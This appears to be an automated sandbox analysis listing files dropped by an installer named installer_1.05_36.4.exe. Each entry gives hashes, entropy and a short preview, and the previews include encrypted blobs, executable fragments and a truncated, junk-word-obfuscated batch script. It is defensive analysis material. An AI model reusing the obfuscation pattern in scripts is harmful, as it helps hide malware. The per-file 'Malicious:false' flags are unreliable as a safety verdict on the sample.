                                                                                                                                                                              MD5:03AE6DCECFF953F258AF1E46B7C64B56
                                                                                                                                                                              SHA1:637EEE92F36824766941A77993232AF61F98EF88
                                                                                                                                                                              SHA-256:90DD3408B758CA4B3A6CCC298153518660CA997179C5EC42163E87CE7A051699
                                                                                                                                                                              SHA-512:02945AD71C6B9E9599E19A1A6E7021392F9339A1D9C45F105862F8736D81BD5FBA1F6EB28CEFDD3D8812843E747F9C92CC926D307FAE9FF8323960BEBA4D6B50
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....@......U.0...R....%\I..D~i...&n.x..dK.!k...N..P..5....4.e>L.Y....[..2.$t...>.....l.3U....\.m.\..x.9...0>..d..3..4.-.......H...2....e..U/..8..p............F..a.q`Aq|.q...}....;.:>.....N..`2.l.y.)._F .@_./g;....MQ`..h.3".+.PCo.b.V...c@CZP...6CoF.8....+#N...k....=S.7.......+....T..(......3.$9....:......#.`.nj....5.kI....g.}..VQpq.....{.....'M).P7T.x.m...7<......eA..$..P............`.M].?.8/-b-....|/.............j...?y]KP...b<.3. *.C..X....#TW.+..................!....W.C~2......PV...v..u..T3m..'.VS.+...u.......m.,..Q..Q....7..!...%.Xm)...I.@S.J.jl..c....e.~>]..x.G..OX{..}.w........HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...5.=.'.F...h.............iW..&...iW..&...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 488173 bytes, 10 files, at 0x2c +A "Bmw" +A "Exhibit", ID 6382, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):488173
                                                                                                                                                                              Entropy (8bit):7.998336016759455
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:12288:NjAAlkMYCbJezDf/jYGP3XzZYLs6jLGW5ekETq4h+8MAz49UK:2AlFJCDXjYQHV0s6jLG2FEZhkAz4D
                                                                                                                                                                              MD5:7A94B55C797CD4B6C1708E85EEE5FF26
                                                                                                                                                                              SHA1:A1765A10272E671CA987F79D0EFED259269DCF93
                                                                                                                                                                              SHA-256:3D8AD14A80662A2876789D560A1598E405E59634B0B715F518D496F34035A346
                                                                                                                                                                              SHA-512:A81D8AB3EF60377C8B6B1C78026B12D880D71E4FCA4FA5E3A8ADCA552171AD4BBCB1781E348DDC404FE9F287D36272C913A490E6B42B1429165D1BF33BFAE954
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MSCF.....r......,......................................YFE .Bmw............YFE .Exhibit.E..........YFE .M.....E......YFE .Straight.....E......YFE .Organization..H..E7.....YFE .Utils.....E......YFE .Turkish.....E......YFE .Riverside.....E......YFE .Mf....._......YFE .Handbags..3...K..CK...|T.0~.+Y.] . A".J....%,.D.......,.......p.hK .d...{+.....U{....e.........+ .Ku.0.@.y.g..&Al..}..ts..<..3..<3g..*..s....?2g.p..=...|.Ve...d..lr.XQY.\./Y.].z.?.....~.....f.O.O.gk...A..h.U....*.c....s,Xe]..5.]..z...h.....w.[...!.q.Zrbr. .!...w.kU......*..G.P./U..w.)'.....`8..fmYq..|.~.....z.......".C..T...2...(*.{S5......*kY._V..L.A@..?..A`.\.0.u..._ts.....B-v|_....]'.]..1....<MCYgz.!.y..A.....,.2}.#&....,=e.fv.b.T.....@....Q. .Kp.}.~..+@...C.AH|.9J....,...3..........9P.F.|.Q.....mc.....)K^../F-...N..)^.7..{.H8.7_.....yzA"e.&9.w....I.x.C..~E..y.A.&.C..<|..NB...@...0.2......e._.a...P...C...H..........p.~EB}....j..O..x...U<..W....~. Dfg7$..`..3.Q.g...0..F.....*...;....^..x.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61440
                                                                                                                                                                              Entropy (8bit):6.706138983890846
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMI/:K4CE0Imbi80PL
                                                                                                                                                                              MD5:5F75B451770B80BA4030B8B181EAA3AF
                                                                                                                                                                              SHA1:C88613AF396AE12B6DE9F67AF3F58C7F8054C7B2
                                                                                                                                                                              SHA-256:A9988F89F1AAA3674DAB275E824C66E94A4F38F8391977A744E61EE3A95C3AA3
                                                                                                                                                                              SHA-512:5C4A5CE1EA7CA8EE1B5616004AEEB04680C64939276749AB8E9947C94F497B5484F7F64661A23A325B424D393A1AFC18395D6C6EB5C546C15CC5C2CCDDAA04D6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.f.p.Df..5`CJ...Y...Y....f.W...Y.f.\%.BJ...Y...X...Y...\.f.p....X...\...\.f..D$..D$.....-......A..-...f.s.&f.s.&f...f.U...\.......Y...X.f.V...\...Y.......\...Q.%.............f.T.f.s..f....f.V.f.n.f.p............Y<.p.J...Y...Y...Y...\.f.T..CJ...X...\...X.f..-XCJ...\...X.f...hCJ...^.f...`CJ.f.X..p.J.......Y...Y...Y.....Y...Y...X.f.....Y...X...X.%....f........f.p....X...\...X...X...X.f.W.f..D$..D$.......;..=.8........f...f.(5pCJ.f...f.(..CJ.f.(%.CJ.f.Y.f.(-.BJ....f.Y.f.Y.f.Y.......Y.f.X.f.Y...Y.f.X.f.p..f.Y.f.p....\.f.p....\...\...\...\...\...X.f..D$..D$.....-.;...........f.W.f.T=.CJ.f..%.CJ.f.(.pCJ...Y.f.(..CJ...\.f.(..CJ.f.p.D..Q.f.Y.f.p.Df....f.Y.f.X.f...0CJ.f.Y........Y.f.X.f.p.D..Y.f.T..CJ.f.Y.f.T.f.p.D..\...X...Y...\...\...Y.f.p....\...^...f.X.f.Y.f.p....X.%....f....f.p....X...X...X...X.f.W.f..D$..D$..........=..........f.~.f.s. f.~...........?+............f..T$.f.~.f.s. f.~........................f.W.f.W......f......Y..:......f..D$..T$......T$.....T$...$.....f..D$.......f..D$..
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):96256
                                                                                                                                                                              Entropy (8bit):7.99788181244933
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:m378CuEi18cY8d+VUd4TJ43MbNmXlAs/3FY/cbcxJ1NimR0edc+fz85FPi9iCQHp:mTu7Fdd+VUd4N0X/yUb8Cea2z8PaH/VU
                                                                                                                                                                              MD5:7B20D716504F9DBBED75028ADEB8E7CD
                                                                                                                                                                              SHA1:CE44372DA55901EE60293EBFD38F2B05C8FD1CBB
                                                                                                                                                                              SHA-256:4716BAB4A5FDBB0482DCEA819990C2A331F20967D6BC7D034749825CB0F568C5
                                                                                                                                                                              SHA-512:BD3915C342F460BE4A720BD6766654BE29BFABD5F580C07DEB54A843EB0BF9F16FE9EEC435EBB99496EA2ABEBC1E0164AA65FDC7AA125204B5D28D690B513442
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.Sy......=...-.I.&r..B]..4YXZk.~....y..ZG....s.A..NM.l...3.%....o.^/....%.r..d..U.....7#c......j+....htQ=i...B3...^..e.._.z.W]..3.*m...y..D..,...VX.K$0w....]....6H..2d..6:..m....e.....}...[.. ....8..F3wK..b...:%......" Uxn..s...b...".H.!.\.....m.x.G...GX..f)?R..OP..c...-.CXY..f..(gR.kR()m.bS.=....9...u.._q*.W...g).%'.Wp..&.ylF)y.z..e+Yk.y.......B...)..W....O.>.......J..F.Q.Z.....*Y.. ....J..=.....6&......#.....i......;....Vm.......R.P.T...-...fH..g5.]r{oIBw."....Q..e..81.h.u..:...9...}.$H.t.....z..b......r..........w.n....(LQ[3....p.1...\..Y..V.2.q.+p...E..b........H...@D.D......%.."%.t.3._1...)..vB.R..#U..b....i_c... ..6k...6.t..v.4.3E....l...r2...|0.X...c.v."..+......Y....7.*1.0|8wT.~.7......P.3X...1xb4.]...9..~.cV....Qf.=5^...=,.F..~&..$P.N.Q\..`.W.J..0....{..w.......3./...NVd...G.......kp.,.....,..m.\/.......F..UQ..}.{...,M.;.......,....YT*.;$.K.......G....@..)..2.........r...1....N..lX....1k.7...I.......(..S...g......O..S.>.d..H
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):88064
                                                                                                                                                                              Entropy (8bit):7.997876793578293
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:RVGkEVhQjr49w1KuVUU7RXkS6VFMivQ5LJ109nOg+1FBkNDgvo:ykEVhQjc9wAu+U7mS6xvY1kk1FBACo
                                                                                                                                                                              MD5:AF13AAD8BD1F6DD28912CE4DBB4448AC
                                                                                                                                                                              SHA1:70D5F2A06E576C46E1DD5CAD5E8245EAD119B8FF
                                                                                                                                                                              SHA-256:59E301046236D74AEF18E13CC826F2A1C14F93009ADF71ED2F920A6F71EE7B7A
                                                                                                                                                                              SHA-512:26FB87D1CAA02FEB2C5561CFE6354AF658CD1D1760FCC867341A961B426327FC127C35CE6740C29DC7B2019C1ED0D54C7881A0455EBC52A9355434AEC2F98420
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:....@......U.0...R....%\I..D~i...&n.x..dK.!k...N..P..5....4.e>L.Y....[..2.$t...>.....l.3U....\.m.\..x.9...0>..d..3..4.-.......H...2....e..U/..8..p............F..a.q`Aq|.q...}....;.:>.....N..`2.l.y.)._F .@_./g;....MQ`..h.3".+.PCo.b.V...c@CZP...6CoF.8....+#N...k....=S.7.......+....T..(......3.$9....:......#.`.nj....5.kI....g.}..VQpq.....{.....'M).P7T.x.m...7<......eA..$..P............`.M].?.8/-b-....|/.............j...?y]KP...b<.3. *.C..X....#TW.+..................!....W.C~2......PV...v..u..T3m..'.VS.+...u.......m.,..Q..Q....7..!...%.Xm)...I.@S.J.jl..c....e.~>]..x.G..OX{..}.w........HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...5.=.'.F...h.............iW..&...iW..&...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                              Entropy (8bit):6.6483765519522
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:ZCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj8:ZCOMVIPPL/sZ7HS3zcNPj8
                                                                                                                                                                              MD5:EAB697C79BF8A1996A376B359846F13C
                                                                                                                                                                              SHA1:739AABBC29055363EB02121C519139EEBEC4C654
                                                                                                                                                                              SHA-256:F235C4CCDCB327501DC648D9E488575FF5F5E022053B77C1F689126873760411
                                                                                                                                                                              SHA-512:F653576C4CB745708A9A3E359CBFC1E2A3C1FBDE248670A817964DFDB53F12BB19122F4D166941B02043459D92232F24F759BA55BFF67C15E673896844EDFE0B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..........L..........y.I..A.....E.,K.......K.... cL....................H.......E...........f;...q....FD.....E...a.........Y................;............Fh..................j..........f;...z.....FD......k.........c...;........Q....V..N|..t%.E..}.;.sSW.F.PQ.M.............d....5.V....+.E.;.w#f..f;F4u......A....E.f.@.f;F6..0....}.E........t=.F|.M....;.u-.~..u'.~..u!f..f;F4u..Fh...........~...i...}.E..N|;...=T......E.........;.......f.......f#......f;........E.......E.;F|...S.........E..]..D....E.;F|...S.........}....E.t0..%....=....u".E.............%............E...........5....FD...........#....E.;F|..qS.........}....E.t0..%....=....u".E.............%............E................FD...............E.;F|...S.........}....E.t0..%....=....u".E.............%............E..........._....FD......H....M....E.;F|...R.........}....E.t0..%....=....u".E.............%............E................FD................E.;F|..0R.........}....E.t0..%....=....u".E.............%.........
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1240), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26036
                                                                                                                                                                              Entropy (8bit):5.096582818860482
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:oukDekjJVi6yO7iNgWrUoztbXDQockPrxLmsnv3lG8AFipjocZ4:we6v/21U8bzQDcrvVzAGw
                                                                                                                                                                              MD5:CFE69139A330974529BE5A4080F825A7
                                                                                                                                                                              SHA1:21D9623BA56905E73C681ED7F39CEE008C506981
                                                                                                                                                                              SHA-256:75764C175A7FFDCEDCC012734842B2AC82AEDF3EE56453467CBAB67641A87B52
                                                                                                                                                                              SHA-512:866CDCE03F8900C3D0472E6230C38AAF49D0D29E0357A773693610A5ACFA5E8F2FC4253B88548D469D1B8020D95F0F11BDFC5E791496190022A698D79CF7A6D2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:Set Trips=j..XXgTin-Joined-Browsers-According-Wordpress-Announcement-Extend-Infrared-..wVinCent-Coleman-Fake-Holdem-Reseller-Ui-Portfolio-Talk-..ABZRailroad-..sCPForward-..QKlAndy-Sagem-Alternatively-Trust-Inbox-Framing-May-..teAccounting-Lobby-Consultant-Federation-Boulder-Airlines-..FnUruguay-Notifications-Banks-Mines-Jewel-Cable-Careful-Boolean-Jurisdiction-..nuQt-Chemistry-Paul-Vhs-Villas-Chart-Whole-..qIOdNathan-..Set Select=H..tBkGLa-Telecom-Loan-..pINavigator-Songs-Slip-..lzLooks-Injury-Champions-..hBRLDurable-Parameters-Oz-Brakes-Standards-Novels-Jeffrey-Supporters-..uBDemanding-Because-Lauderdale-Attractive-Optimum-Novelty-Porn-..pNcReports-Copy-Golden-Valve-..XynAssurance-Demo-January-Mart-Medical-Govt-Wm-..XUtMission-Ebay-Fu-Passport-Transfer-Outside-Trackback-Cheats-..HBEdt-Found-Pad-..Set Copper=r..JpCio-Text-..jaAsia-Carriers-Wonderful-Modular-Tablets-..bhIGerald-Conservative-Senegal-Wrestling-..EzUScript-Weblogs-Blair-Humanity-..seDaisy-Villas-William-Gas-Led-Cellular-Bl
                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1240), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26036
                                                                                                                                                                              Entropy (8bit):5.096582818860482
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:oukDekjJVi6yO7iNgWrUoztbXDQockPrxLmsnv3lG8AFipjocZ4:we6v/21U8bzQDcrvVzAGw
                                                                                                                                                                              MD5:CFE69139A330974529BE5A4080F825A7
                                                                                                                                                                              SHA1:21D9623BA56905E73C681ED7F39CEE008C506981
                                                                                                                                                                              SHA-256:75764C175A7FFDCEDCC012734842B2AC82AEDF3EE56453467CBAB67641A87B52
                                                                                                                                                                              SHA-512:866CDCE03F8900C3D0472E6230C38AAF49D0D29E0357A773693610A5ACFA5E8F2FC4253B88548D469D1B8020D95F0F11BDFC5E791496190022A698D79CF7A6D2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:Set Trips=j..XXgTin-Joined-Browsers-According-Wordpress-Announcement-Extend-Infrared-..wVinCent-Coleman-Fake-Holdem-Reseller-Ui-Portfolio-Talk-..ABZRailroad-..sCPForward-..QKlAndy-Sagem-Alternatively-Trust-Inbox-Framing-May-..teAccounting-Lobby-Consultant-Federation-Boulder-Airlines-..FnUruguay-Notifications-Banks-Mines-Jewel-Cable-Careful-Boolean-Jurisdiction-..nuQt-Chemistry-Paul-Vhs-Villas-Chart-Whole-..qIOdNathan-..Set Select=H..tBkGLa-Telecom-Loan-..pINavigator-Songs-Slip-..lzLooks-Injury-Champions-..hBRLDurable-Parameters-Oz-Brakes-Standards-Novels-Jeffrey-Supporters-..uBDemanding-Because-Lauderdale-Attractive-Optimum-Novelty-Porn-..pNcReports-Copy-Golden-Valve-..XynAssurance-Demo-January-Mart-Medical-Govt-Wm-..XUtMission-Ebay-Fu-Passport-Transfer-Outside-Trackback-Cheats-..HBEdt-Found-Pad-..Set Copper=r..JpCio-Text-..jaAsia-Carriers-Wonderful-Modular-Tablets-..bhIGerald-Conservative-Senegal-Wrestling-..EzUScript-Weblogs-Blair-Humanity-..seDaisy-Villas-William-Gas-Led-Cellular-Bl
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):118784
                                                                                                                                                                              Entropy (8bit):6.318578020476229
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:1Zg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2Uj:1K5vPeDkjGgQaE/loUj
                                                                                                                                                                              MD5:D95F8431D62495080F59E5E4B8EB847B
                                                                                                                                                                              SHA1:33F66C070377B5F91BCB493214D5C1B8124FE02B
                                                                                                                                                                              SHA-256:131117AC28A5FD15E90F71CAC7E33286BAF16AE869A50422D297D0242C7610E5
                                                                                                                                                                              SHA-512:765BB929C51EE545150AC98067F152D27E1E09C1DF98FB792AEEBA2FA7C1DF3C862D2508785D7553428D878613C6C153B475000EF7EF5855B917318CBDD741A2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M.
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                              Entropy (8bit):7.997704372452459
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:Km2qi0TT6RebVhfQVLNQruw0N9xG0zUUDF9Sqcszr+RDlDRzCCC05rO:JKRebVpiw0TXIq94E+NlVuCC0o
                                                                                                                                                                              MD5:068CD09E7FF353985E872715A2565105
                                                                                                                                                                              SHA1:E7DAD733369FB78E72483C3C9DEB5AD72E514E91
                                                                                                                                                                              SHA-256:55AD932C1FC3699D9D29B2C86DB8775819BA436A1810B1676D34E1279C05F59B
                                                                                                                                                                              SHA-512:9822B261296ABF13BE5367DB9333FF172F3A9ACFD7D5F21C94F73F56F1D41955BCA0023BB8067B13DB4F1188AA960ED8DBB3F3481D97BB84773862D1E22AFB29
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:~.v.....&9.]......mA.\\.C. $=.s.o....P.n.l+......(....T"9.e,?.a........D.. aG..2...]..?O...h....q..VF.(.H._.RG8W..adC....[.f.N ...FE.Q.......}.4cX D..R...E..<(C...x.'..3'%.C.I...!.....*..B1.....S8......^&...~F...-....t..'..=.:..f.b=..q-%s.j`..S..j..X.V....`..X.$C?..@...>.o.S...1.f,.....J...).p.*qZ.P/O.u..m..is.."E.......s:.(...:.Ns..v?../..l.u._..P....m.r.3a...'.......oi.*....".,./..z...._.{.|Y...G./.8......1......_.T..6Rvoho....`..Y~dil...,Q...S....as...!..w...S...d.F...+..;).....H....KC...S....."..GNo..0n....+.P..l.K.7t.....$.q{.v.Q^.[7c)..*...3[I....k1..m..T:nJ..{..Ol.....v..5..e.l.P.l.7.&.......?...V...+.j6~..%.&......#.k.}..0.X.yg...l&.h..6..]].b.....ig.N..Y.....R33..7..C.x.....^./..5|.M...M^..\.H..()..t..V.W.F..G...)..;v.a...5......[T.V.....6Y4n.r..BK....!.....=..BI.._...3.p.G..L..EY.S.lc...U..~.i.D.;cx.w.o.)C6c%%....!Z.G$.....6.._..,.d'.....L6..4=...A9~A..3..+....<\....g....p4.XX.}[.+...j<.U.vr...c.,...N..x..G......H
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1861
                                                                                                                                                                              Entropy (8bit):4.803491264264377
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:syGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+JvU1SX6u:t9n9mTsCNvEQH5O5U1nPKrhBzM1Fu
                                                                                                                                                                              MD5:5CAC4ED1F354860BA6420E94EE340F6D
                                                                                                                                                                              SHA1:6910481C1C150B27B54606B5994C7224C8640011
                                                                                                                                                                              SHA-256:57A441BB2C25C5D1896CFBF112F051990389B8DD64F316E5C5658A92D533FC9C
                                                                                                                                                                              SHA-512:6AF0960A798B656FE5D115FE3491F6F75AFB994B35DFB2606CD403288A59A9A41D1A961492BA01C8C7F878519ACC56E43F55C6F03558A24031869C959889FD84
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:brandon........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55578
                                                                                                                                                                              Entropy (8bit):6.831228016941532
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:pr2+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:d2+9BGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                              MD5:3AAB4AAD6EDA212E09D41BA64FBBBF0F
                                                                                                                                                                              SHA1:FFE98558B407CE9F971ED71D07A555B85F0F1CC0
                                                                                                                                                                              SHA-256:179AF49073D90B1AE5F7CEE235318CB602BD01E2E0EA15A3A2BFDE1528F4A989
                                                                                                                                                                              SHA-512:2554EE3A0C353A75575D079EAA81EEDD0B12B6C707D3B8863E16368FC796A6A9E3F2659A92C47F2844C9AEC1091D591851426158A5950DDD8B9752AA16D00859
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...^........................k.................................]...]...e...o...o...o...o...o...n...]...]...i...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...o...h...]...].......................................................b...]...]...p..............................].......................................................................................]...]...a............................W.....................]...]...]...]..............................q...].............................................................................]...]...]...].......................W.........................]...]...]...]...]..............................`...`.......................................................................d...]...]...]...].............................................p...]...]...]...]...]...f..............................]...r...........................................
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):104448
                                                                                                                                                                              Entropy (8bit):5.093773221340636
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:OKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZw:Q6whxjgarB/5elDWy4Zw
                                                                                                                                                                              MD5:29CCC6B6DB8D7842066F428005610B08
                                                                                                                                                                              SHA1:60902EC9523DC9D228BA46F99C0A858F7C1D8985
                                                                                                                                                                              SHA-256:27DC8A337EF502330E0C066240B2E2C3A621FCBF5314AAF1B6A30CD934AEB178
                                                                                                                                                                              SHA-512:C60D6F7237C00F0D4314E970448BD9FE43DFA78087CC7719341B573986A463FB5F15E8464B72615D148D4062B8E7F262A5E137B35B24DF100864F6BF8A594C37
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):97280
                                                                                                                                                                              Entropy (8bit):7.997824134918433
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:HdjXwEOd/7FoBfmTHEn34fAuOIIEfvYQ06cIwk33+JFgSo2tNf10eOLW3sqsoDQ3:H5w5TFoYIhEvYDNK3Mip2zf10nLW3sqo
                                                                                                                                                                              MD5:5813CD191801B14B95F7FBD8EA3DF3E1
                                                                                                                                                                              SHA1:CB54AD79ECB01FF0E9CCEAE9836D11BDEBF64C00
                                                                                                                                                                              SHA-256:FF93EFAA042B75DFDF1CC826901BE4CF12300D83D57011AAF9F6BDC492888D4F
                                                                                                                                                                              SHA-512:0D443E67124C27CE5F63826198601B97FA2D84A5E2F9E8CC7C2EFC9A07624E6039F80C205E3F1CF2D66A3611D2FAE3D9055BB0DACB12ECFB0EBC433434F67C3D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.9,>\.0..C...~..[......c.V_i.Cv.n....8. X.]../D.}b.K..3..\..z..`.!.S....'.pO..O.&..AXg...7.....%=@...X\b...3.....:.C...."|..%Gat~....:.G...;....9.SG....A,.V4 ..+......w.............b65..j=...._.w../^lt%.j...z. _D..{./..-......x}#>&c.C.r3...3..R9)..v.|0.P.X.].C5..v.Y.:I..9X~.....:.-...:7......8<.c.X.x&...+D....f..........4*z....m"....A!&.Ig92./.wt}..1.a.....l7.H..(.i.....!..k>Bk.@.D..bE&?.+.c\..I......\.....u.H.A.h.,..kG.Sl?....*.\..u.}l..0...S..+.c.)..D|......!.6.R......3.....{p...'.8..-...~..4...a.K...El#..../.F#...Z..U...w.p*.h.3%h...........Y....a...7.T.I.....X~TYjqIyg.Nb..2.!FV...H.).*..M..)....~....i../......v..:$1.7.....7..>....bL........9G.......?..r....]..$."'.........8..l.!~.rU....-.._~.C5.*h...,...PPZ.B.^....h..Md....b.Q.dtO...!B.&*..}e4s..\...9\...H6...q..C...p*-.........Zc...g_g..v.....+.u.w...3.G..............%.....x...i.....(.B.~.6.L(3.Z...b...|F..TH.P..U..(wT..;2W.hG..k.. B...Ui ..M.....&,.$.3..c..s..R......&k.(.>..j.8......B.
                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                              Entropy (8bit):6.700143120271754
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:HQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAN:Htf0accB3gBmmLsiS+SAN
                                                                                                                                                                              MD5:82E2E8DAB38A84EDD1CD7853E02D20C3
                                                                                                                                                                              SHA1:4649563A9C003AAD2130C1E253D0F746DDF90ACF
                                                                                                                                                                              SHA-256:605200D39960B4EA829DA3D4D3585BE49AACBBEA10F47CB0E329546E0E1D1B6F
                                                                                                                                                                              SHA-512:AFE19AAA285F86C3E9C05EF6CF35AA571812F25B0D1F8439AF74CB24455B4C351CA5ED42C1B324E5300DD06E28C7BC0B98414ADB536214430A25FCC342ED5FCE
                                                                                                                                                                              Malicious:false
